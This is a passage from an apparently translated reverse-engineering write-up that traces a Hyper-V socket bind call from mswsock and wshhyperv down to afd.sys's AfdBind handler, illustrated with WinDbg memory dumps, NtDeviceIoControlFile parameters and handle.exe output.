<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bind</span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The socket function finished successfully, bind is executed further</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">iResult = bind(ListenSocket, hints.ai_addr, (</span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)hints.ai_addrlen);</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further I will try not to get information for usermode as detailed as for socket, and I will note only those moments which are specific to Hyper-V sockets. Mswsock!WSPbind is caused, further mswsock!WahReferenceContextByHandle (HANDLE socket, PVOID SockContextTable). Comparison of the address of the procedure, contained in ebx, with the address of the beginning mswsock_Tcpip4_WSHGetSockaddrType, or mswsock_Tcpip6_WSHGetSockaddrType is carried out. If the address coincides, there is a call of the corresponding procedure, if is not - then call ebx is carried out (in our case wshhyperv! WSHGetSockaddrType)</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="68" src="https://lh6.googleusercontent.com/Xi54xOOf5D9kALZQgGtxatDFvhfZpXy2yqxTxkqRSwcah2uEWeL308IPh41uUKtcAYKorRNlwiA2K45SOzRx8LS3Hc7vg0zYLZ8vZrumgIXfCF04OM-zXzlQYwGDYh8pMFLfj-YbnbXI4H4gyw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="592" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The type of a socket is get on the basis of GUID set during execution of bind (we set HV_GUID_ZERO)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="159" src="https://lh4.googleusercontent.com/-kbQPty3VuZMnb_ABETHzjDJVhUYSGwvZQ3tOXgOv60c4desbpB-bDkUJRxeYaYFwzMB2PSqfP3jvb7C08jtfKAtnCi_PzMQNt0BNL_8rFZr4Bb9XVFXTrU9zyuOZiHcRg_p4IdxTjRQL49oAw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="414" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the server in esi:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @esi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f990 00000022 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000 00000000 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> "............... – </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_ZERO</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f9a0 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f9b0 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b7a9d77 </span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the client:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc esi – in esi virtual machine ID GUID </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-6a964317-1d87-4a74-abf9-46a69b048900 (GUID which was returned on the server when performing a cmdlet of Get-VM | select ID, Name)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb2c 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6a964317 4a741d87 a646f9ab "....C.j..tJ..F.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb3c</span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0089049b</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb4c</span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6a964317 4a741d87 a646f9ab w.z..C.j..tJ..F. ????????????</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb5c</span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0089049b</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb6c</span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00d90000 40000062 02020202 w.z.....b..@....</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb7c 536e6957 206b636f 00302e32 00000000 WinSock 2.0.....</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Comparison of GUID is made at first with HV_GUID_LOOPBACK, then with HV_GUID_BROADCAST and then HV_GUID_ZERO. Then 0 returned. Before it there was a check of the second argument on excess of the 24 and first dword of first argument on equality with 22. Otherwise error was returned (271E and 273F respectively).</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further there are various checks, then ntdll!NtDeviceIoControlFile is caused.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint). On the client - \Device\Afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, F6F728</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 12003</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1223088</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,28</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1223088</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For descriptive reasons we will check this using handle.exe from Sysinternals Suite:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">handle.exe -a -p ServerExample.exe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">140: Event </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">144: File (---) \Device\Afd\Endpoint (on client - \Device\Afd)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 1223088 1223088+28</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223088 00000000 00000022 00000000 00000000 ...."...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223098 00000000 00000000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">........>.....pE – </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUID of our service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">012230a8 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">487662ad 1b7a9d77 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">abababab .bvHw.z.....</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The afd.sys driver registers function for handle IOCTL codes</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> !drvobj afd 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Driver object (ffffa40eb952c0d0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> \Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dispatch routines:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[0e] IRP_MJ_DEVICE_CONTROL fffff8008ab7d460</span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchDeviceControl</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Fast I/O routines:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FastIoRead fffff80aa54fbed0 afd!AfdFastIoRead</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FastIoWrite fffff80aa54fbfd0 afd!AfdFastIoWrite</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FastIoUnlockAll fffff80aa55018f0 afd!AfdSanFastUnlockAll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FastIoDeviceControl fffff80aa54f1ab0 afd!AfdFastIoDeviceControl</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's consider what occurs in a kernel at this stage. IOCTL code 12003 of the table AfdIoctlTable in the table AfdIrpCallDispatch corresponds to afd!AfdBind which is caused from afd!AfdDispatchDeviceControl.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="187" src="https://lh3.googleusercontent.com/_AyNJomMRFFjPcc_WECg010TLq2mfRbPad5oq-VkSRjTn4TGLGT4xyKVvRdSk8NACnFEHzLRQf07ZtNkr54cxyrAdYqIKkcgMKd-eU25XdQTMIyJh0h3n3_IUEKyD3HKZgBvh4m-8G0nAM8n8w" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="365" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Pointer to IRP is transferred as first parameter of Afd!AfdBind functions (in rcx)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!irp @rcx 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Irp is active with 4 stacks 4 is current (= 0xffffda8527506d18) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UserIosb = 00e6e920</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UserEvent = ffffda85299be6f0 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UserBuffer = 01223088</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmd flg cl Device File Completion-Context</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">>[IRP_MJ_DEVICE_CONTROL(e), N/A(0)]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 5 0 ffffda8527de29d0 ffffda8529a9bcf0 00000000-00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> \Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Args: 00000024 00000028 00012003 01223088</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!object @r8 – 3-й параметр – Driver Object</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8527de19c0 Type: (ffffda852718cf20) Driver</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ObjectHeader: ffffda8527de1990 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HandleCount: 0 PointerCount: 4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Directory Object: ffffca897e8f7060 Name: AFD</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx – 2-й параметр</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
